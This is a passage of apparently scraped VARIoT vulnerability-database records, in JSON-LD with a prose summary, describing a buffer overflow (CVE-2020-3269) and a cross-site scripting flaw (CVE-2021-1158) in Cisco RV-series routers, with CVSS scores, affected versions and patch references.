          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202006-1114",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.5"
          },
          {
            "model": "rv130w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.54"
          },
          {
            "model": "rv130",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.54"
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.5"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Kai Cheng",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-3269",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-3269",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-006870",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-35167",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-3269",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-3269",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-006870",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-3269",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2020-3269",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-006870",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-35167",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202006-1157",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco RV110W is a VPN firewall router from Cisco in the United States. \n\r\n\r\nThere are buffer overflow vulnerabilities in the web management interface of many Cisco products. The vulnerability stems from the program\u0027s failure to properly limit user input boundaries",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-3269",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2119",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2119.2",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "id": "VAR-202006-1114",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          }
        ],
        "trust": 1.2765999149999998
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:35:43.614000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-routers-injection-tWC7krKQ",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-injection-tWC7krKQ"
          },
          {
            "title": "Patch for Multiple Buffer Overflow Vulnerabilities in Cisco Products (CNVD-2020-35167)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/223607"
          },
          {
            "title": "Multiple Cisco Product Buffer Error Vulnerability Fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=121850"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          },
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-routers-injection-twc7krkq"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3269"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3269"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2119/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2119.2/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-06-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "date": "2020-07-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "date": "2020-06-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "date": "2020-06-18T03:15:12.073000",
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-06-30T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-35167"
          },
          {
            "date": "2020-07-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          },
          {
            "date": "2021-10-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          },
          {
            "date": "2024-11-21T05:30:41.823000",
            "db": "NVD",
            "id": "CVE-2020-3269"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006870"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202006-1157"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0800

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0800",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "cve": "CVE-2021-1158",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1158",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41156",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374212",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1158",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1158",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1158",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1158",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1158",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41156",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1022",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374212",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
